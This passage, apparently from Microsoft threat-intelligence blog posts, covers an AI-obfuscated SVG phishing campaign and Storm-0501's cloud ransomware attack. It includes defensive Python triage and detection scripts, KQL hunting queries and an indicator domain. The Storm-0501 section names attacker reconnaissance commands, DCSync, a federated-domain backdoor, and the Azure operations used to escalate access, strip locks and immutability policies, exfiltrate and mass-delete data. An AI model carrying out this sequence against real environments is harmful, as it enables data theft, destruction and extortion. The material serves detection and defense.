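    """Identifier ends in a 4+ char hex run that contains at least one digit."""
    m = HEX_SUFFIXED.fullmatch(ident)
    return bool(m) and any(c.isdigit() for c in m.group(1))


def triage_svg(svg_text):
    """Return the list of suspicious traits found in the SVG source text."""
    findings = []
    if svg_text.lstrip().startswith("<?xml"):
        findings.append("xml_declaration")
    if "<![CDATA[" in svg_text:
        findings.append("cdata_block")
    root = ET.fromstring(svg_text)
    scripts = [el for el in root.iter() if _local(el.tag) == "script"]
    if scripts:
        findings.append("embedded_script")
    invisible = [el for el in root.iter() if _invisible(el)]
    if invisible:
        findings.append(f"invisible_elements:{len(invisible)}")
    for el in invisible:  # data parked on an element the user can never see
        for name, value in el.attrib.items():
            if name.startswith("data-") and len(value.split()) >= 8:
                findings.append(f"hidden_data_attribute:{name}")
    script_text = " ".join(s.text or "" for s in scripts)  # CDATA lands in .text
    for label, pattern in SCRIPT_PATTERNS:
        if pattern.search(script_text):
            findings.append(label)
    if any(_hex_suffixed(i) for i in IDENTIFIER.findall(script_text)):
        findings.append("hex_suffixed_identifiers")
    return findings


def is_suspicious(svg_text, threshold=3):
    """Verdict: three or more independent traits is treated as suspicious."""
    return len(triage_svg(svg_text)) >= threshold
```

A legitimate SVG logo carries no script at all, so the verdict rests on the combination of traits rather than on any single one; an SVG that merely contains a script still deserves a sandbox detonation, because this pass reads the file without executing it and cannot see where the decoded redirect points.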
Using AI to analyze the campaign
Given the unique methods used to obfuscate the SVG payload’s functionality, we hypothesized that the attacker may have used AI to assist them. We asked Security Copilot to analyze the contents of the SVG file to assess whether it was generated by AI or an LLM. Security Copilot’s analysis indicated that it was highly likely that the code was synthetic and likely generated by an LLM or a tool using one. Security Copilot determined that the code exhibited a level of complexity and verbosity rarely seen in manually written scripts, suggesting it was produced by an AI model rather than crafted by a human.
Security Copilot provided five key indicators to support its conclusion. These are stylistic heuristics rather than proof of provenance: a human author imitating generated code, or one who used an LLM only to rename and comment hand-written code, would leave the same traces, so they support the assessment without making it a definitive attribution.
Overly descriptive and redundant naming
The function and variable names (e.g., processBusinessMetricsf43e08, parseDataFormatf19e04, convertMetricsDataf98e36, initializeAnalytics4e2250, userIdentifierb8db, securityHash9608) follow a consistent pattern of descriptive English terms concatenated with random hexadecimal strings. This naming convention is typical of AI/LLM-generated code, which often appends random suffixes to avoid collisions and increase obfuscation.
Figure 6. Example of overly descriptive variable and function names
Modular and over-engineered code structure
The code structure is highly modular, with clear separation of concerns and repeated use of similar logic blocks (e.g., mapping business terms to character codes, block reversal, offset correction, token-based validation). This systematic approach is characteristic of AI/LLM output, which tends to over-engineer and generalize solutions.
Figure 7. Example of over-engineered logic parsing the business terminology
Generic comments
Comments are verbose, generic, and use formal business language (“Advanced business intelligence data processor”, “Business terminology parser for standardized format conversion”, “Generate secure processing token for data validation”), which is a hallmark of AI-generated documentation.
Figure 8. Examples of verbose, generic comments.
Formulaic obfuscation techniques
The obfuscation techniques (e.g., encoding business terms, multi-stage data transformation, dynamic function creation) are implemented in a way that is both thorough and formulaic, matching the style of AI/LLM code generation.
Unusual use of CDATA and XML declaration
The SVG code includes both an XML declaration and a CDATA-wrapped script, which is more typical of LLM-generated code that aims to be “technically correct” or to mimic documentation examples, even when such elements are unnecessary for the attack to function.
Figure 9. Example of the SVG’s XML declaration and CDATA-wrapped script
Using AI to detect the campaign
While the use of AI to obfuscate phishing payloads may seem like a significant leap in attacker sophistication, it’s important to understand that AI does not fundamentally change the core artifacts that security systems rely on to detect phishing threats. AI-generated code may be more complex or syntactically polished, but it still operates within the same behavioral and infrastructural boundaries as human-crafted attacks.
Microsoft Defender for Office 365 uses AI and machine learning models that are trained to detect phishing and designed to identify patterns across multiple dimensions, not just the payload itself. These include:
Attack infrastructure (such as suspicious domain characteristics, hosting behavior)
Tactics, techniques, and procedures (TTPs) (such as the use of redirects, CAPTCHA gates, session tracking)
Impersonation strategies (such as pretending to share documents, mimicking file-sharing notifications)
Message context and delivery patterns (such as self-addressed emails, BCC usage, mismatched sender/recipient behavior)
These signals are largely unaffected by whether the payload was written by a human or an LLM. In fact, AI-generated obfuscation often introduces synthetic artifacts, like verbose naming, redundant logic, or unnatural encoding schemes, that can become new detection signals themselves.
Despite the use of AI to obfuscate the SVG payload, this campaign was blocked by Microsoft Defender for Office 365’s detection system through a combination of infrastructure analysis, behavioral indicators, and message context, none of which were impacted by the use of AI. Signals used to detect this campaign included the following:
Use of self-addressed email with BCCed recipients – This tactic is commonly used to attempt to bypass basic email heuristics and hide the true recipient list.
Suspicious file type/name – SVG files have been an emerging phishing payload in general, and the attachments in this campaign were named to resemble PDFs, which is atypical for legitimate document sharing.
Redirect to malicious infrastructure – The SVG payload redirected to a domain that had previously been identified as being linked to phishing content.
General use of code obfuscation – While the SVG file contained novel obfuscation tactics that hadn’t been seen before, the presence of obfuscation alone was an indicator of potentially malicious intent.
Suspicious network behavior – Automated analysis of the phishing site indicated that it employed session tracking and browser fingerprinting, which can be used to selectively serve content based on geography or environment, a behavior used by some phishing actors.
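The message-level signals above (self-addressed mail with the real recipients in BCC, and a scriptable attachment named to look like a document) can be checked from gateway metadata before the payload is parsed at all. The following is an added example written for this page, not Defender for Office 365's detection logic; the message records are constructed, and the list of document-like words and the two-signal threshold are assumptions to tune for your own environment.

```python
"""Message-context triage over constructed mail gateway metadata.
Added example; not Microsoft detection content."""
import os
from email.utils import parseaddr

# Constructed records, shaped like what a mail gateway logs per message.
MESSAGES = [
    {"id": "m1", "from": "Accounts <sender@example.com>", "to": ["sender@example.com"],
     "bcc": ["victim1@target.example", "victim2@target.example"],
     "subject": "Shared document", "attachments": ["23mb - PDF- 6 pages.svg"]},
    {"id": "m2", "from": "alice@example.com", "to": ["bob@partner.example"],
     "bcc": [], "subject": "Q3 logo", "attachments": ["logo.svg"]},
    {"id": "m3", "from": "alice@example.com", "to": ["bob@partner.example"],
     "bcc": [], "subject": "Invoice", "attachments": ["invoice.pdf"]},
]

# Extensions a browser will execute script from when the file is opened.
SCRIPTABLE = {".svg", ".html", ".htm", ".shtml", ".xhtml"}
# Words that make a file name read like a document (assumed list).
DOC_WORDS = ("pdf", "doc", "docx", "xls", "xlsx", "invoice", "statement")


def _addr(value):
    """Normalise 'Display <user@host>' to a lower-cased address."""
    return parseaddr(value)[1].lower()


def attachment_signals(name):
    """Signals for one attachment file name."""
    base, ext = os.path.splitext(name.lower())
    reasons = []
    if ext in SCRIPTABLE:
        reasons.append("scriptable_attachment")
        if any(word in base for word in DOC_WORDS):
            reasons.append("attachment_name_mimics_document")
    return reasons


def message_signals(msg):
    """Signals for one message: self-addressing, hidden targets, attachments."""
    reasons = []
    sender = _addr(msg["from"])
    if any(_addr(rcpt) == sender for rcpt in msg["to"]):
        reasons.append("self_addressed")
        if msg["bcc"]:  # the real targets are hidden from the visible header
            reasons.append("targets_hidden_in_bcc")
    for name in msg["attachments"]:
        reasons.extend(attachment_signals(name))
    return reasons


def triage(messages, threshold=2):
    """Map message id -> signals for messages at or above the threshold."""
    hits = {}
    for msg in messages:
        reasons = message_signals(msg)
        if len(reasons) >= threshold:
            hits[msg["id"]] = reasons
    return hits
```

A single SVG attachment from a designer (m2) is not enough on its own; it is the stacking of delivery tricks with a document-lookalike scriptable attachment that separates m1 from routine mail.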
Recommendations
While this campaign was limited in scope and effectively blocked, similar techniques are increasingly being leveraged by a range of threat actors. Sharing our findings equips organizations to identify and mitigate these emerging threats, regardless of the specific threat actor behind them. Microsoft Threat Intelligence recommends the following mitigations, which are effective against a range of phishing threats, including those that may use AI-generated code.
Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks.
Turn on Zero-hour auto purge (ZAP) in Defender for Office 365 to retroactively quarantine phishing, spam, or malware messages that have already been delivered to mailboxes when newly acquired threat intelligence identifies them.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attack tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic | Observed activity | Microsoft Defender coverage
Initial access | Phishing emails sent from a compromised small business email account; the emails contained an attached SVG file. | Microsoft Defender for Office 365: tenant admins can use Threat Explorer to query associated SVG file attachments using the file type, file extension, or attachment file name fields. The rule description in Threat Explorer is "This SVG has traits consistent with credential phishing campaigns." Microsoft Defender XDR alert: Malicious email-sending activity from a risky user
Execution | Embedded JavaScript within the attached SVG file executed upon opening in a browser. |
Defense evasion | Obfuscation using invisible SVG elements and encoded business terminology; fake CAPTCHA, browser fingerprinting, and session tracking used to evade detection. |
Impact | Potential credential theft if the targeted user completes the phishing flow. | Microsoft Defender XDR alert: Risky sign-in attempt following a possible phishing campaign
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Hunting queries
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub using an ARM template or manually.
Detect network domain indicators of compromise using ASIM
The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser:
//Domain list- _Im_NetworkSession
let lookback = 30d;
// No IP indicators were published for this campaign; add any from your own analysis.
let ioc_ip_addr = dynamic([]);
let ioc_domains = dynamic(["kmnl.cpfcenters.de"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstDomain has_any (ioc_domains) or DstIpAddr in (ioc_ip_addr)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect domain and URL indicators of compromise using ASIM
The following query checks domain and URL IOCs across data sources supported by ASIM web session parser:
// Domain list - _Im_WebSession
let ioc_domains = dynamic(["kmnl.cpfcenters.de"]);
_Im_WebSession (url_has_any = ioc_domains)
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence has observed financially motivated threat actor Storm-0501 continuously evolving their campaigns to achieve sharpened focus on cloud-based tactics, techniques, and procedures (TTPs). While the threat actor has been known for targeting hybrid cloud environments, their primary objective has shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.
Unlike traditional on-premises ransomware, where the threat actor typically deploys malware to encrypt critical files across endpoints within the compromised network and then negotiates for a decryption key, cloud-based ransomware introduces a fundamental shift. Leveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom—all without relying on traditional malware deployment.
Storm-0501’s targeting is opportunistic. The threat actor initially deployed Sabbath ransomware in an attack against United States school districts in 2021. In November 2023, the actor targeted the healthcare sector. Over the years, the actor switched ransomware payloads multiple times, using Embargo ransomware in 2024 attacks.
In September 2024, we published a blog detailing how Storm-0501 extended its on-premises ransomware operations into hybrid cloud environments. The threat actor gained a foothold by compromising Active Directory environments and then pivoted to Microsoft Entra ID, escalating privileges on hybrid and cloud identities to gain global administrator privileges. The impact phase of these attacks took one of two forms: implanting backdoors in Entra ID tenant configurations using maliciously added federated domains to allow sign-in as nearly any user or deploying on-premises ransomware to encrypt endpoints and servers, eventually demanding ransom for the decryption keys.
Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows. They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals.
In this blog post, we describe the impact of a recent Storm-0501 attack on a compromised cloud environment. We trace how the threat actor achieved cloud-based ransomware impact through cloud privilege escalation, taking advantage of protection and visibility gaps across the compromised environment, and pivoting from on-premises to the cloud. Understanding how such attacks are conducted is critical to protecting cloud environments. Below we share protection and mitigation recommendations, including strengthening protections for cloud identities and cloud resources, and detection guidance across Microsoft security solutions to help organizations harden their networks against these attacks.
Figure 1. Overview of Storm-0501 cloud-based ransomware attack chain
On-premises compromise and pivot to the cloud
In a recent campaign, Storm-0501 compromised a large enterprise composed of multiple subsidiaries, each operating its own Active Directory domain. These domains are interconnected through domain trust relationships, enabling cross-domain authentication and resource access.
The cloud environment mirrors this complexity. Different subsidiaries maintain separate Microsoft Azure tenants, with varying Microsoft Defender product coverage. Notably, only one tenant had Microsoft Defender for Endpoint deployed, and devices from multiple Active Directory domains were onboarded to this single tenant’s license. This fragmented deployment created visibility gaps across the environment.
Active Directory domains were synchronized to several Entra ID tenants using Entra Connect Sync servers. In some cases, a single domain was synced to more than one tenant, further complicating identity management and monitoring. For clarity, this blog focuses on the two tenants impacted by the attack: one where on-premises activity was observed, and another where cloud-based activity occurred.
Figure 2. Storm-0501 on-premises attack chain
On-premises activity
For the purposes of this blog, we focus our analysis on the post-compromise phase of the on-premises attack, meaning that the threat actor had already achieved domain administrator privileges in the targeted domain. Read our previous blog for a more comprehensive overview of Storm-0501 tactics in on-premises environments.
The limited deployment of Microsoft Defender for Endpoint across the environment significantly hindered detection. Of the multiple compromised domains, only one domain had significant Defender for Endpoint deployment, leaving portions of the network unmonitored. On the few onboarded devices where Storm-0501 activity was observed, we noted that the threat actor conducted reconnaissance before executing malicious actions. Specifically, the threat actor used the following commands:
sc query sense
sc query windefend
The threat actor checked for the presence of Defender for Endpoint services (sense is the Defender for Endpoint sensor service and windefend is the Microsoft Defender Antivirus service), suggesting a deliberate effort to avoid detection by targeting non-onboarded systems. This highlights the importance of comprehensive endpoint coverage.
Lateral movement was facilitated using Evil-WinRM, a post-exploitation tool that uses PowerShell over Windows Remote Management (WinRM) for remote code execution. The commands above were executed over sessions initiated with the tool, as was discovery using other common native Windows tools and commands such as quser.exe and net.exe. Earlier in the attack, the threat actor had compromised an Entra Connect Sync server that was not onboarded to Defender for Endpoint. We assess that this server served as a pivot point, with the threat actor establishing a tunnel to move laterally within the network.
The threat actor also performed a DCSync attack, a technique that abuses the Directory Replication Service (DRS) Remote Protocol to simulate the behavior of a domain controller. By impersonating a domain controller, the threat actor could request password hashes for any user in the domain, including privileged accounts. This technique is often used to extract credentials without triggering traditional authentication-based alerts.
Pivot to the cloud
Following the on-premises compromise of the first tenant, the threat actor leveraged the Entra Connect Sync Directory Synchronization Account (DSA) to enumerate users, roles, and Azure resources within the tenant. This reconnaissance was performed using AzureHound, a tool designed to map relationships and permissions in Azure environments and consequently find potential attack paths and escalations.
Shortly thereafter, the threat actor attempted to sign in as several privileged users. These attempts were unsuccessful, blocked by Conditional Access policies and multifactor authentication (MFA) requirements. This suggests that while Storm-0501 had valid credentials, they lacked the necessary second factor or were unable to satisfy policy conditions.
Undeterred, Storm-0501 shifted tactics. Leveraging their foothold in the Active Directory environment, they traversed between Active Directory domains and eventually moved laterally to compromise a second Entra Connect server associated with a different Entra ID tenant and Active Directory domain. The threat actor extracted the Directory Synchronization Account credentials to repeat the reconnaissance process, this time targeting identities and resources in the second tenant.
Identity escalation
As a result of the discovery phase, in which the threat actor leveraged on-premises control to pivot across Active Directory domains and extensively enumerate cloud resources, they gained critical visibility into the organization’s security posture. They then identified a non-human synced identity that was assigned the Global Administrator role in Microsoft Entra ID on that tenant. Additionally, this account lacked any registered MFA method. This enabled the threat actor to reset the user’s on-premises password, which shortly after was legitimately synced to the cloud identity of that user by the Entra Connect Sync service. We identified that the password change was conducted by the Entra Connect Directory Synchronization Account (DSA), since the Entra Connect Sync service was configured in the most common mode, Password Hash Synchronization (PHS). Consequently, the threat actor was able to authenticate against Entra ID as that user using the new password.
Since no MFA method was registered for that user, after successfully authenticating with the newly assigned password the threat actor was simply redirected to register a new MFA method, which they placed under their control. From then on, the compromised user had a registered MFA method that enabled the threat actor to meet MFA requirements and satisfy the customer’s per-resource Conditional Access policy configuration.
To access the Azure portal using the compromised Global Admin account, the threat actor had to satisfy one more condition enforced by Conditional Access policies for that resource, which required authentication to occur from a Microsoft Entra hybrid joined device. Hybrid joined devices are joined to both the Active Directory domain and Entra ID. We observed failed authentication attempts coming from company devices that were only domain-joined or only Entra-joined and therefore did not meet the Conditional Access condition. The threat actor had to move laterally between different devices in the network until we observed a successful sign-in to the Azure portal with the Global Admin account coming from a server that was hybrid joined.
From the point that the threat actor was able to successfully meet the Conditional Access policies and sign in to the Azure portal as a Global Admin account, Storm-0501 essentially achieved full control over the cloud domain. The threat actor then utilized the highest possible cloud privileges to achieve their goals in the cloud.
Figure 3. Storm-0501 cloud identity and cloud environment compromise leading to extortion
Cloud identity compromise: Entra ID
Cloud persistence
Following successful authentication as a Global Admin to the tenant, Storm-0501 immediately established a persistence mechanism. As was seen in the threat actor’s previous activity, Storm-0501 created a backdoor using a maliciously added federated domain, enabling them to sign in as almost any user, according to the ImmutableId user property. The threat actor leveraged the Global Administrator Entra role privileges and the AADInternals tool to register a threat actor-owned Entra ID tenant as a trusted federated domain by the targeted tenant. To establish trust between the two tenants, a threat actor-generated root certificate is provided to the victim tenant, which in turn is used to allow authentication requests coming from the threat actor-owned tenant. The backdoor enabled Storm-0501 to craft security assertion markup language (SAML) tokens applicable to the victim tenant, impersonating users in the victim tenant while assuming the impersonated user’s Microsoft Entra roles.
Cloud compromise: Azure
Azure initial access and privilege escalation
A tenant’s Entra ID and Azure environments are intertwined. And since Storm-0501 gained top-level Entra ID privileges, they could proceed to their final goal, which was to use cloud-based ransomware tactics for monetary gain. To achieve this goal, they had to find the organization’s valuable data stores, and these were residing in the cloud: in Azure.
Because they had compromised a user with the Microsoft Entra Global Administrator role, the only operation they had to do to infiltrate the Azure environment was to elevate their access to Azure resources. They elevated their access to Azure resources by invoking the Microsoft.Authorization/elevateAccess/action operation. By doing so, they gained the User Access Administrator Azure role over all the organization’s Azure subscriptions, including all the valuable data residing inside them.
To freely operate within the environment, the threat actor assigned themselves the Owner Azure role over all the Azure subscriptions available by invoking the Microsoft.Authorization/roleAssignments/write operation.
Discovery
After taking control over the organization’s Azure environment, we assess that the threat actor initiated a comprehensive discovery phase using various techniques, including the usage of the AzureHound tool, where they attempted to locate the organization’s critical assets, including data stores that contained sensitive information, and data store resources that are meant to back up on-premises and cloud endpoint devices. The threat actor managed to map out the Azure environment, including the understanding of existing environment protections, such as Azure policies, resource locks, Azure Storage immutability policies, and more.
Defense evasion
The threat actor then targeted the organization’s Azure Storage accounts. Using the public access features in Azure Storage, Storm-0501 exposed accounts that were not remotely accessible to the internet and to their own infrastructure, paving the way for the data exfiltration phase. To modify the Azure Storage account resources, the threat actor abused the Azure Microsoft.Storage/storageAccounts/write operation.
Credential access
For Azure Storage accounts that had key access enabled, the threat actor abused their Azure Owner role to access and steal the accounts’ access keys through the Azure Microsoft.Storage/storageAccounts/listkeys/action operation.
Exfiltration
After exposing the Azure Storage accounts, the threat actor exfiltrated the data in these accounts to their own infrastructure by abusing the AzCopy Command-line tool (CLI).
Impact
In on-premises ransomware, the threat actor typically deploys malware that encrypts crucial files on as many endpoints as possible, then negotiates with the victim for the decryption key. In cloud-based ransomware attacks, cloud features and capabilities give the threat actor the capability to quickly exfiltrate and transmit large amounts of data from the victim environment to their own infrastructure, destroy the data and backup cloud resources in the victim cloud environment, and then demand the ransom.
After completing the exfiltration phase, Storm-0501 initiated the mass deletion of the Azure resources containing the victim organization’s data, preventing the victim from taking remediation and mitigation action by restoring the data. They did so by abusing the following Azure operations against multiple Azure resource providers:
Microsoft.Compute/snapshots/delete – Deletes Azure Snapshot, a read-only, point-in-time copy of an Azure VM’s disk (VHD), capturing its state and data at a specific moment, that exists independently from the source disk and can be used as a backup or clone of that disk.
Microsoft.Compute/restorePointCollections/delete – Deletes the Azure VM Restore Point, which stores virtual machines (VM) configuration and point-in-time application-consistent snapshots of all the managed disks attached to the VM.
Microsoft.Storage/storageAccounts/delete – Deletes the Azure storage account, which contains an organization’s Azure Storage data objects: blobs, files, queues, and tables. In all of the Storm-0501 Azure campaigns we investigated, this is where they mainly focused, deleting as many Azure Storage account resources as possible in the environment.
Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete – Deletes an Azure recovery services vault protection container. A protection container is a logical grouping of resources (like VMs or workloads) that can be backed up together, within the Recovery Services vault.
During the threat actor’s attempts to mass-delete the data store resources, they encountered errors and failed to delete some of the resources due to the existing protections in the environment. These protections include Azure resource locks and Azure Storage immutability policies. They then attempted to remove these protections using the following operations:
Microsoft.Authorization/locks/delete – Deletes Azure resource locks, which are used to prevent accidental user deletion and modification of Azure subscriptions, resource groups, or resources. The lock overrides any user permission.
Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete – Deletes Azure storage immutability policies, which protect blob data from being overwritten or deleted.
After successfully deleting multiple Azure resource locks and Azure Storage immutability policies, the threat actor continued the mass deletion of the Azure data stores, successfully erasing resources in various Azure subscriptions. For resources that remained protected by immutability policies, the actor resorted to cloud-based encryption.
To perform cloud-based encryption, Storm-0501 created a new Azure Key Vault and a new customer-managed key inside the Key Vault, which was meant to be used to encrypt the remaining Azure Storage accounts using the Azure Encryption scopes feature:
Microsoft.KeyVault/vaults/write – Creates or modifies an existing Azure Key Vault. The threat actor created a new Azure Key Vault to host the encryption key.
Microsoft.Storage/storageAccounts/encryptionScopes/write – Creates or modifies Azure storage encryption scopes, which manage encryption with a key that is scoped to a container or an individual blob. When you define an encryption scope, you can specify whether the scope is protected with a Microsoft-managed key or with a customer-managed key that is stored in Azure Key Vault.
The threat actor abused the Azure Storage encryption scopes feature and encrypted the Storage blobs in the Azure Storage accounts. This wasn’t sufficient, as the organization could still access the data with the appropriate Azure permissions. In an attempt to make the data inaccessible, the actor deleted the key used for the encryption. However, it’s important to note that Azure Key Vaults and keys used for encryption purposes are protected by the Azure Key Vault soft-delete feature, with a default period of 90 days, which allows the user to recover the deleted key or vault, preventing cloud-based encryption for ransomware purposes.
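The destructive sequence described above (escalation, refused deletes, removal of locks or immutability policies, mass deletion, then encryption setup) as an added detection example that is not Microsoft’s code: it walks constructed Azure control-plane events and rates each caller. The event field names ('caller', 'time', 'operation', 'status') are assumptions, not a real log schema; only the operation names come from the text.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Control-plane operations the text attributes to Storm-0501, grouped by stage.
ESCALATION = {"Microsoft.Authorization/elevateAccess/action",
              "Microsoft.Authorization/roleAssignments/write"}
PROTECTION_REMOVAL = {"Microsoft.Authorization/locks/delete",
                      "Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete"}
DESTRUCTIVE = {"Microsoft.Compute/snapshots/delete",
               "Microsoft.Compute/restorePointCollections/delete",
               "Microsoft.Storage/storageAccounts/delete",
               "Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete"}
ENCRYPTION_SETUP = {"Microsoft.KeyVault/vaults/write",
                    "Microsoft.Storage/storageAccounts/encryptionScopes/write"}


def analyze_caller(events, window=timedelta(hours=6), mass_delete_threshold=3):
    """Walk one caller's events in time order and record which stages appear.
    Each event is a dict with 'time' (ISO 8601), 'operation' and 'status'
    ('Succeeded' or 'Failed'); these field names are an assumption."""
    f = {"escalation": False, "blocked_deletes": 0, "protection_removal": 0,
         "mass_delete": False, "protection_then_delete": False,
         "encryption_setup": False}
    recent_deletes = []            # successful deletes inside the sliding window
    last_protection_removal = last_blocked_delete = None
    for e in sorted(events, key=lambda x: x["time"]):
        op, t = e["operation"], datetime.fromisoformat(e["time"])
        ok = e["status"] == "Succeeded"
        if op in ESCALATION and ok:
            f["escalation"] = True
        elif op in PROTECTION_REMOVAL and ok:
            f["protection_removal"] += 1
            last_protection_removal = t
            # A lock or immutability policy removed soon after a refused delete
            # is the pattern described in the text.
            if last_blocked_delete and t - last_blocked_delete <= window:
                f["protection_then_delete"] = True
        elif op in DESTRUCTIVE:
            if not ok:
                f["blocked_deletes"] += 1
                last_blocked_delete = t
                continue
            recent_deletes = [d for d in recent_deletes if t - d <= window] + [t]
            if len(recent_deletes) >= mass_delete_threshold:
                f["mass_delete"] = True
            if last_protection_removal and t - last_protection_removal <= window:
                f["protection_then_delete"] = True
        elif op in ENCRYPTION_SETUP and ok:
            f["encryption_setup"] = True
    return f


def severity(f):
    """The full chain (escalation plus protection removal or mass deletion) is
    critical; partial chains rank lower but still deserve a look."""
    if f["escalation"] and (f["protection_then_delete"] or f["mass_delete"]):
        return "critical"
    if f["protection_then_delete"] or f["mass_delete"] or f["encryption_setup"]:
        return "high"
    if f["escalation"] or f["protection_removal"] or f["blocked_deletes"]:
        return "medium"
    return "info"


def analyze(events, **kwargs):
    """Group events by caller; return findings plus a severity for each caller."""
    by_caller = defaultdict(list)
    for e in events:
        by_caller[e["caller"]].append(e)
    result = {}
    for caller, evs in by_caller.items():
        f = analyze_caller(evs, **kwargs)
        f["severity"] = severity(f)
        result[caller] = f
    return result


def _ev(caller, hhmm, status, operation):
    """Build one constructed event on a fixed date (sample data, not real telemetry)."""
    return {"caller": caller, "time": f"2025-01-01T{hhmm}:00",
            "status": status, "operation": operation}


# 'attacker' follows the sequence from the text; 'ops-admin' deletes one snapshot.
SAMPLE_EVENTS = [
    _ev("attacker", "01:00", "Succeeded", "Microsoft.Authorization/elevateAccess/action"),
    _ev("attacker", "01:05", "Succeeded", "Microsoft.Authorization/roleAssignments/write"),
    _ev("attacker", "02:00", "Failed", "Microsoft.Storage/storageAccounts/delete"),
    _ev("attacker", "02:03", "Succeeded", "Microsoft.Authorization/locks/delete"),
    _ev("attacker", "02:05", "Succeeded", "Microsoft.Storage/storageAccounts/delete"),
    _ev("attacker", "02:06", "Succeeded", "Microsoft.Compute/snapshots/delete"),
    _ev("attacker", "02:07", "Succeeded", "Microsoft.Compute/restorePointCollections/delete"),
    _ev("attacker", "03:00", "Succeeded", "Microsoft.KeyVault/vaults/write"),
    _ev("attacker", "03:02", "Succeeded", "Microsoft.Storage/storageAccounts/encryptionScopes/write"),
    _ev("ops-admin", "09:00", "Succeeded", "Microsoft.Compute/snapshots/delete"),
]
```

Running analyze(SAMPLE_EVENTS) rates the constructed 'attacker' caller critical and the routine 'ops-admin' deletion info.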
After successfully exfiltrating and destroying the data within the Azure environment, the threat actor initiated the extortion phase, where they contacted the victims using Microsoft Teams using one of the previously compromised users, demanding ransom.
Mitigation and protection guidance
Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks to escalate privileges. Additionally, a new version released in May 2025 introduces modern authentication, allowing customers to configure application-based authentication for enhanced security (currently in public preview). It is also important to enable Trusted Platform Module (TPM) on the Entra Connect Sync server to securely store sensitive credentials and cryptographic keys, mitigating Storm-0501’s credential extraction techniques.
The techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:
Protecting on-premises
Turn on tamper protection features to prevent threat actors from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Turn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.
Protecting cloud identities
Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID and Azure environments to slow or stop threat actors.
Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
Set a Conditional Access policy to limit the access of Microsoft Entra ID Directory Synchronization Accounts (DSA) from untrusted IP addresses to all cloud apps. Please refer to the advanced hunting section and check the relevant query to get those IP addresses.
For Entra Connect Sync servers using application-based authentication, use Conditional Access for workload identities to restrict the application’s service principal from similar unauthorized access.
Ensure separate user accounts and mail forwarding for Global Administrator accounts. Global Administrator (and other privileged groups) accounts should be cloud-native accounts with no ties to on-premises Active Directory. See other best practices for using Privileged roles here.
Ensure all existing privileged users already have a registered MFA method to protect against malicious MFA registrations.
Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID Directory Synchronization Account and all other users.
Enable protection to prevent bypassing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID. This enhances protection against federated domain attacks.
Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
